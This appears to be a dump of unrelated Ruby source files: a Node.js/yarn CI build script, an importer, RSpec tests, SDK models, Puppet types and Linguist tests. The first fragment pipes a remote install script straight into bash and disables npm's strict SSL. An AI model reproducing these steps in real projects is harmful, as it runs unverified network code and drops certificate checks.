sh.if "$(command -v sw_vers) && -f $HOME/.npmrc" do
sh.cmd "npm config delete prefix"
end
end
def npm_disable_spinner
sh.cmd 'npm config set spin false', echo: false, timing: false
end
def npm_disable_strict_ssl
# sh.echo '### Disabling strict SSL ###', ansi: :red
sh.cmd 'echo "### Disabling strict SSL ###"'
sh.cmd 'npm conf set strict-ssl false', echo: true
end
def npm_disable_progress
sh.cmd "npm config set progress false", echo: false, timing: false
end
def npm_strict_ssl?
!node_0_6? && !node_0_8? && !node_0_9?
end
def node_0_6?
(config[:node_js] || '').to_s.split('.')[0..1] == %w(0 6)
end
def node_0_8?
(config[:node_js] || '').to_s.split('.')[0..1] == %w(0 8)
end
def node_0_9?
(config[:node_js] || '').to_s.split('.')[0..1] == %w(0 9)
end
def use_npm_cache?
Array(config[:cache]).include?('npm')
end
def setup_npm_cache
if data.hosts && data.hosts[:npm_cache]
sh.cmd 'npm config set registry http://registry.npmjs.org/', timing: false
sh.cmd "npm config set proxy #{data.hosts[:npm_cache]}", timing: false
end
end
def iojs_3_plus?
(config[:node_js] || '').to_s.split('.')[0].to_i >= 3
end
def npm_install(args)
sh.fold "install.npm" do
sh.if "$(vers2int `npm -v`) -ge $(vers2int #{NPM_CI_CMD_VERSION}) && (-f npm-shrinkwrap.json || -f package-lock.json)" do
sh.cmd "npm ci #{args}", retry: true
end
sh.else do
sh.cmd "npm install #{args}", retry: true
end
sh.if "$(vers2int `npm -v`) -gt $(vers2int #{NPM_QUIET_TREE_VERSION})" do
sh.cmd "npm ls", echo: true, assert: false
end
end
end
def install_yarn
sh.if "-f yarn.lock" do
sh.if yarn_req_not_met do
sh.echo "Node.js version $(node --version) does not meet requirement for yarn." \
" Please use Node.js #{YARN_REQUIRED_NODE_VERSION} or later.", ansi: :red
npm_install config[:npm_args]
end
sh.else do
sh.fold "install.yarn" do
sh.if "-z \"$(command -v yarn)\"" do
sh.if "-z \"$(command -v gpg)\"" do
sh.export "YARN_GPG", "no"
end
sh.echo "Installing yarn", ansi: :green
sh.cmd "curl -o- -L https://yarnpkg.com/install.sh | bash", echo: true, timing: true
sh.echo "Setting up \\$PATH", ansi: :green
sh.export "PATH", "$HOME/.yarn/bin:$PATH"
end
end
end
end
end
def prepend_path(path)
sh.if "$(echo :$PATH: | grep -v :#{path}:)" do
sh.export "PATH", "#{path}:$PATH", echo: true
end
end
def yarn_req_not_met
"$(vers2int $(echo `node --version` | tr -d 'v')) -lt $(vers2int #{YARN_REQUIRED_NODE_VERSION})"
end
end
end
end
end
| 32.55516 | 297 | 0.486773 |
f7a7b276c7c49adbbf5832b6ba64cc535e57a9fc | 2,848 | class SupplyTeachers::GenerateBranches
include SupplyTeachers::DataImportHelper
attr_reader :supplier_branches
def initialize(current_data)
@current_data = current_data
end
def generate_branches
@supplier_branches = collate(branches.map { |row| nest(row, :branches) })
end
private
# rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
def branches
branches_data = []
read_spreadsheet(@current_data.geographical_data_all_suppliers) do |branch_workbook|
branch_sheet = branch_workbook.sheet('Branch details')
branches_data = branch_sheet.parse(header_search: ['Supplier Name'])
.map { |row| remap_headers(row, HEADER_MAP) }
.map.with_index { |row, index| row.merge(line_no: index + 3) }
.map { |row| convert_html_fields_to_text(row) }
.map { |row| convert_float_fields_to_int(row) }
.map { |row| strip_fields(row) }
.map { |row| match_email_to_contacts(row) }
.map { |row| row }
.map { |row| strip_keys_with_null_or_empty_values(row) }
.map { |row| strip_punctuation_from_postcode(row) }
end
branches_data
end
# rubocop:enable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
def match_email_to_contacts(row)
names = row[:contact_name].split(%r{[,/\n]+}m)
emails = row[:email].split(/[;\s]+/)
contacts = names.zip(emails)
contacts = contacts.map { |(name, email)| { name: name, email: email } }
new_row = if names.count != emails.count
row.merge(contacts: [])
else
row.merge(contacts: contacts)
end
new_row.reject { |k, _v| %i[contact_name email].include? k }
end
def convert_html_fields_to_text(row)
row.transform_values { |v| v.is_a?(String) ? Capybara.string(v).text : v }
end
def convert_float_fields_to_int(row)
row.transform_values { |v| v.is_a?(Float) ? v.to_i : v }
end
def strip_punctuation_from_postcode(row)
row.merge(postcode: row[:postcode].gsub(/[^\w\s]/, ''))
end
def strip_keys_with_null_or_empty_values(row)
row.reject { |_, v| v.nil? || v == '' }.to_h
end
HEADER_MAP = {
'Supplier Name' => :supplier_name,
'Branch Name/No.' => :branch_name,
'Branch Contact name' => :contact_name,
'Address 1' => :address_1,
'Address 2' => :address_2,
'Town' => :town,
'County' => :county,
'Post Code' => :postcode,
'Branch Contact Name Email Address' => :email,
'Branch Telephone Number' => :telephone,
'Region' => :region,
}.freeze
end
| 34.731707 | 96 | 0.601826 |
87ff56a78a8223e83d08d96a0da6e21cbc67c1ec | 780 | require 'spec_helper'
RSpec.describe SixSaferpay::Address do
subject { SpinningWheel.create('address') }
let(:hash) {
{
first_name: subject.first_name,
last_name: subject.last_name,
date_of_birth: subject.date_of_birth,
company: subject.company,
legal_form: subject.legal_form,
street: subject.street,
street_2: subject.street_2,
gender: subject.gender,
zip: subject.zip,
city: subject.city,
country_subdevision_code: subject.country_subdevision_code,
country_code: subject.country_code,
phone: subject.phone,
email: subject.email
}
}
describe 'to_hash' do
it 'returns the hash representation of the address' do
expect(subject.to_hash).to eq(hash)
end
end
end
| 24.375 | 65 | 0.680769 |
395d2bce2cd4855daca6d8ed0b92183a88345813 | 2,327 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EdgeGateway::Mgmt::V2019_03_01
module Models
#
# The security settings of a device.
#
class SecuritySettings < ARMBaseModel
include MsRestAzure
# @return [AsymmetricEncryptedSecret] Device administrator password as an
# encrypted string (encrypted using RSA PKCS #1) is used to sign into the
# local web UI of the device. The Actual password should have at least 8
# characters that are a combination of uppercase, lowercase, numeric,
# and special characters.
attr_accessor :device_admin_password
#
# Mapper for SecuritySettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'SecuritySettings',
type: {
name: 'Composite',
class_name: 'SecuritySettings',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
device_admin_password: {
client_side_validation: true,
required: true,
serialized_name: 'properties.deviceAdminPassword',
type: {
name: 'Composite',
class_name: 'AsymmetricEncryptedSecret'
}
}
}
}
}
end
end
end
end
| 29.833333 | 79 | 0.50795 |
6299e34cbe6c04191c1d603adb7fd52da796a2fd | 1,136 | require 'lknovel/utils'
require 'uri'
module Lknovel
class Image
attr_reader :uri, :file
def initialize(url)
@uri = URI(url)
@file = @uri.path.split('/').last
end
def download(dir = '.')
file = File.join(dir, @file)
if !File.exists?(file)
File.open(file, 'wb') do |w|
retryable do
openuri(@uri, 'rb') do |r|
w.write(r.read)
end
end
end
end
end
def crop(output, operation, options = { :dir => '.' })
input = File.join(options[:dir], @file)
begin
dim = IO.popen(['identify', '-format', '%[fx:w] %[fx:h]', input])
dim = dim.gets.split
width = dim[0].to_i
height = dim[1].to_i
rescue Exception
width = 0
height = 0
end
need_crop = true
need_crop = yield(width, height) if block_given?
cropped = false
if need_crop
success = system('convert', input, '-crop', operation, output)
if success and File.exists?(output)
cropped = true
end
end
cropped
end
end
end
| 21.846154 | 73 | 0.516725 |
21cc2a570952c714df12a318966d2a30d2c2f045 | 1,613 | require 'spec_helper'
RSpec.describe 'Vertpig integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:vtc_eur_pair) { Cryptoexchange::Models::MarketPair.new(base: 'VTC', target: 'EUR', market: 'vertpig') }
it 'fetch pairs' do
pairs = client.pairs('vertpig')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'vertpig'
end
it 'fetch ticker' do
ticker = client.ticker(vtc_eur_pair)
expect(ticker.base).to eq 'VTC'
expect(ticker.target).to eq 'EUR'
expect(ticker.market).to eq 'vertpig'
expect(ticker.bid).to be_a Numeric
expect(ticker.ask).to be_a Numeric
expect(ticker.last).to be_a Numeric
expect(ticker.high).to be_a Numeric
expect(ticker.low).to be_a Numeric
expect(ticker.volume).to be_a Numeric
expect(ticker.timestamp).to be_a Numeric
expect(2000..Date.today.year).to include(Time.at(ticker.timestamp).year)
expect(ticker.payload).to_not be nil
end
it 'fetch order book' do
order_book = client.order_book(vtc_eur_pair)
expect(order_book.base).to eq 'VTC'
expect(order_book.target).to eq 'EUR'
expect(order_book.market).to eq 'vertpig'
expect(order_book.asks).to_not be_empty
expect(order_book.bids).to_not be_empty
expect(order_book.asks.first.price).to_not be_nil
expect(order_book.bids.first.amount).to_not be_nil
expect(order_book.bids.first.timestamp).to be_nil
expect(order_book.timestamp).to be_a Numeric
expect(order_book.payload).to_not be nil
end
end
| 33.604167 | 110 | 0.719157 |
e27cb5a2573b9097ef606971a1152391cdd48602 | 547 | cask 'letterfix' do
version '2.5.3,67423'
sha256 'b6125a0f55ef0c52711403613473ba6fc396745f7d2ace88cc46f9d9df57b41d'
url "http://dl.osdn.jp/letter-fix/#{version.after_comma}/LetterFix-#{version.before_comma}.dmg"
appcast 'https://osdn.jp/projects/letter-fix/releases/rss',
checkpoint: '8fa3a0fc1cb40fd5d73719f4e82c8857038afaa14b2d0bf2ef87649fbc46e116'
name 'LetterFix'
homepage 'https://osdn.jp/projects/letter-fix/'
pkg "LetterFix-#{version.before_comma}.pkg"
uninstall pkgutil: 'org.kuri.letterfix.LetterFix.pkg'
end
| 36.466667 | 97 | 0.773309 |
91ef4268a0098f092e7d623229b31b050515029c | 1,729 | # Returns abbr as an uppercase symbol, stripping whitespace.
def get_uppercase_symbol(abbr)
return abbr.to_s.strip.upcase.to_sym
end
# Returns the state name associated with the state abbreviation abbr.
# abbr: A two character (uppercase or lowercase) symbol or string.
# include_dc: (default: false) Whether to include Washington DC as a state.
def get_us_state_from_abbr(abbr, include_dc = false)
abbr = get_uppercase_symbol(abbr)
return include_dc ? STATE_ABBR_WITH_DC_HASH[abbr] : STATE_ABBR_HASH[abbr]
end
# Returns whether the abbreviation is a state (including Washington DC)
# abbreviation.
def us_state_abbr?(abbr, include_dc = false)
return !get_us_state_from_abbr(abbr, include_dc).nil?
end
STATE_ABBR_HASH = {
AL: 'Alabama',
AK: 'Alaska',
AZ: 'Arizona',
AR: 'Arkansas',
CA: 'California',
CO: 'Colorado',
CT: 'Connecticut',
DE: 'Delaware',
FL: 'Florida',
GA: 'Georgia',
HI: 'Hawaii',
ID: 'Idaho',
IL: 'Illinois',
IN: 'Indiana',
IA: 'Iowa',
KS: 'Kansas',
KY: 'Kentucky',
LA: 'Louisiana',
ME: 'Maine',
MD: 'Maryland',
MA: 'Massachusetts',
MI: 'Michigan',
MN: 'Minnesota',
MS: 'Mississippi',
MO: 'Missouri',
MT: 'Montana',
NE: 'Nebraska',
NV: 'Nevada',
NH: 'New Hampshire',
NJ: 'New Jersey',
NM: 'New Mexico',
NY: 'New York',
NC: 'North Carolina',
ND: 'North Dakota',
OH: 'Ohio',
OK: 'Oklahoma',
OR: 'Oregon',
PA: 'Pennsylvania',
RI: 'Rhode Island',
SC: 'South Carolina',
SD: 'South Dakota',
TN: 'Tennessee',
TX: 'Texas',
UT: 'Utah',
VT: 'Vermont',
VA: 'Virginia',
WA: 'Washington',
WV: 'West Virginia',
WI: 'Wisconsin',
WY: 'Wyoming',
}
STATE_ABBR_WITH_DC_HASH = STATE_ABBR_HASH.merge({DC: 'Washington DC'})
| 23.364865 | 75 | 0.665124 |
0821d90daa29398f1561ef669f1acda59faf590f | 206 | ActionController::Routing::Routes.draw do |map|
map.namespace('registry') do |registry|
registry.root :controller => 'registry'
registry.connect ':action/:id', :controller => 'registry'
end
end
| 29.428571 | 61 | 0.703883 |
7a875f2059b390449524d7f20d8d0616d1dc4212 | 6,353 | require 'pathname'
Puppet::Type.newtype(:dsc_xaddomaincontroller) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC xADDomainController resource type.
Automatically generated from
'xActiveDirectory/DSCResources/MSFT_xADDomainController/MSFT_xADDomainController.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_domainname is a required attribute') if self[:dsc_domainname].nil?
end
def dscmeta_resource_friendly_name; 'xADDomainController' end
def dscmeta_resource_name; 'MSFT_xADDomainController' end
def dscmeta_module_name; 'xActiveDirectory' end
def dscmeta_module_version; '2.24.0.0' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_sensitive_hash!(value)
end
end
# Name: DomainName
# Type: string
# IsMandatory: True
# Values: None
newparam(:dsc_domainname) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "DomainName - The FQDN of the domain the Domain Controller will be joining."
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: DomainAdministratorCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_domainadministratorcredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "DomainAdministratorCredential - The 'PSCredential' object containing Domain Adminstrator rights to add the Domain Controller to the domain."
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("DomainAdministratorCredential", value)
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_sensitive_hash!(value)
end
end
# Name: SafemodeAdministratorPassword
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_safemodeadministratorpassword) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "SafemodeAdministratorPassword - The 'PSCredential' object containing the password to use for DSRM."
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("SafemodeAdministratorPassword", value)
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_sensitive_hash!(value)
end
end
# Name: DatabasePath
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_databasepath) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "DatabasePath - The path where the database will be stored."
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: LogPath
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_logpath) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "LogPath - The path where the logs will be stored."
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: SysvolPath
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_sysvolpath) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "SysvolPath - The path where the Sysvol will be stored."
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: SiteName
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_sitename) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "SiteName - The name of the site this Domain Controller will be added to."
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: InstallationMediaPath
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_installationmediapath) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "InstallationMediaPath - The path of the media you want to use install the Domain Controller."
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
Puppet::Type.type(:dsc_xaddomaincontroller).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
defaultfor :operatingsystem => :windows
mk_resource_methods
end
| 31.450495 | 150 | 0.677947 |
396001390e6a66570272b1ac0d5760151082b629 | 7,953 | # frozen_string_literal: true
module Octokit
class Client
# Methods for the ReposReleases API
#
# @see https://developer.github.com/v3/repos/releases/
module ReposReleases
# Get a release
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param release_id [Integer] The ID of the release
# @return [Sawyer::Resource] A single release
# @see https://developer.github.com/v3/repos/releases/#get-a-release
def release(repo, release_id, options = {})
get "#{Repository.path repo}/releases/#{release_id}", options
end
# List releases
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @return [Array<Sawyer::Resource>] A list of releases
# @see https://developer.github.com/v3/repos/releases/#list-releases
def releases(repo, options = {})
paginate "#{Repository.path repo}/releases", options
end
# Create a release
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param tag_name [String] The name of the tag.
# @option options [String] :target_commitish Specifies the commitish value that determines where the Git tag is created from. Can be any branch or commit SHA. Unused if the Git tag already exists. Default: the repository's default branch (usually master).
# @option options [String] :name The name of the release.
# @option options [String] :body Text describing the contents of the tag.
# @option options [Boolean] :draft true to create a draft (unpublished) release, false to create a published one.
# @option options [Boolean] :prerelease true to identify the release as a prerelease. false to identify the release as a full release.
# @return [Sawyer::Resource] The new release
# @see https://developer.github.com/v3/repos/releases/#create-a-release
def create_release(repo, tag_name, options = {})
opts = options.dup
opts[:tag_name] = tag_name
post "#{Repository.path repo}/releases", opts
end
# Update a release
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param release_id [Integer] The ID of the release
# @option options [String] :tag_name The name of the tag.
# @option options [String] :target_commitish Specifies the commitish value that determines where the Git tag is created from. Can be any branch or commit SHA. Unused if the Git tag already exists. Default: the repository's default branch (usually master).
# @option options [String] :name The name of the release.
# @option options [String] :body Text describing the contents of the tag.
# @option options [Boolean] :draft true makes the release a draft, and false publishes the release.
# @option options [Boolean] :prerelease true to identify the release as a prerelease, false to identify the release as a full release.
# @return [Sawyer::Resource] The updated release
# @see https://developer.github.com/v3/repos/releases/#update-a-release
def update_release(repo, release_id, options = {})
patch "#{Repository.path repo}/releases/#{release_id}", options
end
# Delete a release
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param release_id [Integer] The ID of the release
# @return [Boolean] True on success, false otherwise
# @see https://developer.github.com/v3/repos/releases/#delete-a-release
def delete_release(repo, release_id, options = {})
boolean_from_response :delete, "#{Repository.path repo}/releases/#{release_id}", options
end
# Get the latest release
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @return [Sawyer::Resource] The latest release
# @see https://developer.github.com/v3/repos/releases/#get-the-latest-release
def latest_release(repo, options = {})
get "#{Repository.path repo}/releases/latest", options
end
# Get a release asset
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param asset_id [Integer] The ID of the asset
# @return [Sawyer::Resource] A single asset
# @see https://developer.github.com/v3/repos/releases/#get-a-release-asset
def release_asset(repo, asset_id, options = {})
get "#{Repository.path repo}/releases/assets/#{asset_id}", options
end
# List release assets
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param release_id [Integer] The ID of the release
# @return [Array<Sawyer::Resource>] A list of assets
# @see https://developer.github.com/v3/repos/releases/#list-release-assets
def release_assets(repo, release_id, options = {})
paginate "#{Repository.path repo}/releases/#{release_id}/assets", options
end
# Upload a release asset
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param release_id [Integer] The ID of the release
# @param data [String] The raw file data
# @option options [String] :name The name of the asset
# @option options [String] :label The label of the asset
# @return [Sawyer::Resource] The new asset
# @see https://developer.github.com/v3/repos/releases/#upload-a-release-asset
def upload_release_asset(repo, release_id, data, options = {})
file = data.respond_to?(:read) ? data : File.new(data, 'rb')
unless options[:content_type]
begin
require 'mime/types'
if mime_type = MIME::Types.type_for(file.path).first
options[:content_type] = mime_type.content_type
end
rescue LoadError
msg = 'Please pass content_type or install mime-types gem to guess content type from file'
raise Octokit::MissingContentType, msg
end
end
unless name = options[:name]
name = File.basename(file.path)
end
upload_url = release(repo, release_id).rels[:upload].href_template.expand(name: name)
request :post, upload_url, file.read, parse_query_and_convenience_headers(options)
ensure
file&.close
end
# Update a release asset
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param asset_id [Integer] The ID of the asset
# @option options [String] :name The file name of the asset.
# @option options [String] :label An alternate short description of the asset. Used in place of the filename.
# @return [Sawyer::Resource] The updated asset
# @see https://developer.github.com/v3/repos/releases/#update-a-release-asset
def update_release_asset(repo, asset_id, options = {})
patch "#{Repository.path repo}/releases/assets/#{asset_id}", options
end
# Delete a release asset
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param asset_id [Integer] The ID of the asset
# @return [Boolean] True on success, false otherwise
# @see https://developer.github.com/v3/repos/releases/#delete-a-release-asset
def delete_release_asset(repo, asset_id, options = {})
boolean_from_response :delete, "#{Repository.path repo}/releases/assets/#{asset_id}", options
end
# Get a release by tag name
#
# @param repo [Integer, String, Repository, Hash] A GitHub repository
# @param tag [String] The tag of the release
# @return [Sawyer::Resource] A single release
# @see https://developer.github.com/v3/repos/releases/#get-a-release-by-tag-name
def release_by_tag(repo, tag, options = {})
get "#{Repository.path repo}/releases/tags/#{tag}", options
end
end
end
end
| 47.909639 | 261 | 0.663146 |
ed3bef1fef2c6e951e888652e1115a24974c2547 | 4,359 | #!/usr/bin/env rspec
require 'spec_helper'
property = Puppet::Type.type(:file).attrclass(:owner)
describe property do
before do
# FIXME: many of these tests exercise the provider rather than `owner`
# and should be moved into provider tests. ~JW
@provider = Puppet::Type.type(:file).provider(:posix).new
@provider.stubs(:uid).with("one").returns(1)
@resource = stub 'resource', :line => "foo", :file => "bar"
@resource.stubs(:[]).returns "foo"
@resource.stubs(:[]).with(:path).returns "/my/file"
@resource.stubs(:provider).returns @provider
@owner = property.new :resource => @resource
end
it "should have a method for testing whether an owner is valid" do
@provider.must respond_to(:validuser?)
end
it "should return the found uid if an owner is valid" do
@provider.expects(:uid).with("foo").returns 500
@provider.validuser?("foo").should == 500
end
it "should return false if an owner is not valid" do
@provider.expects(:uid).with("foo").returns nil
@provider.validuser?("foo").should be_false
end
describe "when retrieving the current value" do
it "should return :absent if the file cannot stat" do
@resource.expects(:stat).returns nil
@owner.retrieve.should == :absent
end
it "should get the uid from the stat instance from the file" do
stat = stub 'stat', :ftype => "foo"
@resource.expects(:stat).returns stat
stat.expects(:uid).returns 500
@owner.retrieve.should == 500
end
it "should warn and return :silly if the found value is higher than the maximum uid value" do
Puppet.settings.expects(:value).with(:maximum_uid).returns 500
stat = stub 'stat', :ftype => "foo"
@resource.expects(:stat).returns stat
stat.expects(:uid).returns 1000
@provider.expects(:warning)
@owner.retrieve.should == :silly
end
end
describe "when determining if the file is in sync" do
describe "and not running as root" do
it "should warn once and return true" do
Puppet.features.expects(:root?).returns false
@provider.expects(:warnonce)
@owner.should = [10]
@owner.must be_safe_insync(20)
end
end
before do
Puppet.features.stubs(:root?).returns true
end
it "should be in sync if 'should' is not provided" do
@owner.must be_safe_insync(10)
end
it "should directly compare the owner values if the desired owner is an integer" do
@owner.should = [10]
@owner.must be_safe_insync(10)
end
it "should treat numeric strings as integers" do
@owner.should = ["10"]
@owner.must be_safe_insync(10)
end
it "should convert the owner name to an integer if the desired owner is a string" do
@provider.expects(:uid).with("foo").returns 10
@owner.should = %w{foo}
@owner.must be_safe_insync(10)
end
it "should not validate that users exist when a user is specified as an integer" do
@provider.expects(:uid).never
@provider.validuser?(10)
end
it "should fail if it cannot convert an owner name to an integer" do
@provider.expects(:uid).with("foo").returns nil
@owner.should = %w{foo}
lambda { @owner.safe_insync?(10) }.should raise_error(Puppet::Error)
end
it "should return false if the owners are not equal" do
@owner.should = [10]
@owner.should_not be_safe_insync(20)
end
end
describe "when changing the owner" do
before do
@owner.should = %w{one}
@owner.stubs(:path).returns "path"
@owner.stubs(:uid).returns 500
end
it "should chown the file if :links is set to :follow" do
@resource.expects(:[]).with(:links).returns :follow
File.expects(:chown)
@owner.sync
end
it "should lchown the file if :links is set to :manage" do
@resource.expects(:[]).with(:links).returns :manage
File.expects(:lchown)
@owner.sync
end
it "should use the first valid owner in its 'should' list" do
@owner.should = %w{one two three}
@provider.expects(:validuser?).with("one").returns nil
@provider.expects(:validuser?).with("two").returns 500
@provider.expects(:validuser?).with("three").never
File.expects(:chown).with(500, nil, "/my/file")
@owner.sync
end
end
end
| 29.06 | 97 | 0.650837 |
87847df478d493ddbed8b9ad0d86f1acc2ff3d44 | 457 | #!/usr/bin/ruby -I.
require 'minitest/unit'
require 'tmpl'
include MiniTest
Unit.autorun
class TestTmpl < Unit::TestCase
def test_tmpl
tmpl = Tmpl.new(file: "test.erb")
tmpl.set('test1', 'value1')
tmpl.set('test2', '<>&"')
result = tmpl.result
$stderr.puts result
assert_equal(tmpl.result, <<-EOF)
var test1 = value1
var test2 = <>&"
var test2_2 = 'test2 assigned'
var test3 = 'test3 assigned'
EOF
end
end
| 18.28 | 37 | 0.654267 |
ffec6236d933c5111b856608f94bf24c6af5e2fb | 20,183 | require 'linguist/file_blob'
require 'test/unit'
require 'mime/types'
require 'pygments'
class TestBlob < Test::Unit::TestCase
include Linguist
Lexer = Pygments::Lexer
def fixtures_path
File.expand_path("../fixtures", __FILE__)
end
def blob(name)
FileBlob.new(File.join(fixtures_path, name), fixtures_path)
end
def script_blob(name)
blob = blob(name)
blob.instance_variable_set(:@name, 'script')
blob
end
def test_name
assert_equal "foo.rb", blob("foo.rb").name
end
def test_pathname
assert_equal Pathname.new("foo.rb"), blob("foo.rb").pathname
end
def test_mime_type
assert_equal "application/octet-stream", blob("dog.o").mime_type
assert_equal "application/ogg", blob("foo.ogg").mime_type
assert_equal "application/postscript", blob("octocat.ai").mime_type
assert_equal "application/x-ruby", blob("grit.rb").mime_type
assert_equal "application/x-sh", blob("script.sh").mime_type
assert_equal "application/xml", blob("bar.xml").mime_type
assert_equal "text/plain", blob("README").mime_type
end
def test_content_type
assert_equal "application/octet-stream", blob("dog.o").content_type
assert_equal "application/ogg", blob("foo.ogg").content_type
assert_equal "application/pdf", blob("foo.pdf").content_type
assert_equal "image/png", blob("foo.png").content_type
assert_equal "text/plain; charset=iso-8859-2", blob("README").content_type
assert_equal "text/plain; charset=iso-8859-1", blob("script.pl").content_type
assert_equal "text/plain; charset=iso-8859-1", blob("script.py").content_type
assert_equal "text/plain; charset=iso-8859-1", blob("script.rb").content_type
assert_equal "text/plain; charset=iso-8859-1", blob("script.sh").content_type
end
def test_disposition
assert_equal "attachment; filename=foo+bar.jar", blob("foo bar.jar").disposition
assert_equal "attachment; filename=foo.bin", blob("foo.bin").disposition
assert_equal "attachment; filename=linguist.gem", blob("pkg/linguist.gem").disposition
assert_equal "attachment; filename=octocat.ai", blob("octocat.ai").disposition
assert_equal "inline", blob("README").disposition
assert_equal "inline", blob("foo.txt").disposition
assert_equal "inline", blob("grit.rb").disposition
assert_equal "inline", blob("octocat.png").disposition
end
def test_data
assert_equal "module Foo\nend\n", blob("foo.rb").data
end
def test_lines
assert_equal ["module Foo", "end", ""], blob("foo.rb").lines
end
def test_size
assert_equal 15, blob("foo.rb").size
end
def test_loc
assert_equal 3, blob("foo.rb").loc
end
def test_sloc
assert_equal 2, blob("foo.rb").sloc
end
def test_encoding
assert_equal "ISO-8859-2", blob("README").encoding
assert_equal "ISO-8859-1", blob("dump.sql").encoding
assert_equal "UTF-8", blob("foo.txt").encoding
assert_nil blob("dog.o").encoding
end
def test_binary
# Large blobs aren't loaded
large_blob = blob("git.exe")
large_blob.instance_eval do
def data; end
end
assert large_blob.binary?
assert blob("git.deb").binary?
assert blob("git.exe").binary?
assert blob("hello.pbc").binary?
assert blob("linguist.gem").binary?
assert blob("octocat.ai").binary?
assert blob("octocat.png").binary?
assert blob("zip").binary?
assert !blob("README").binary?
assert !blob("file.txt").binary?
assert !blob("foo.rb").binary?
assert !blob("script.pl").binary?
end
def test_text
assert blob("README").text?
assert blob("dump.sql").text?
assert blob("file.json").text?
assert blob("file.txt").text?
assert blob("md").text?
assert blob("script.sh").text?
assert blob("tender.md").text?
assert blob("txt").text?
end
def test_image
assert blob("octocat.gif").image?
assert blob("octocat.jpeg").image?
assert blob("octocat.jpg").image?
assert blob("octocat.png").image?
assert !blob("octocat.ai").image?
assert !blob("octocat.psd").image?
end
def test_viewable
assert blob("README").viewable?
assert blob("foo.rb").viewable?
assert blob("script.pl").viewable?
assert !blob("linguist.gem").viewable?
assert !blob("octocat.ai").viewable?
assert !blob("octocat.png").viewable?
end
def test_generated
assert !blob("README").generated?
# Xcode project files
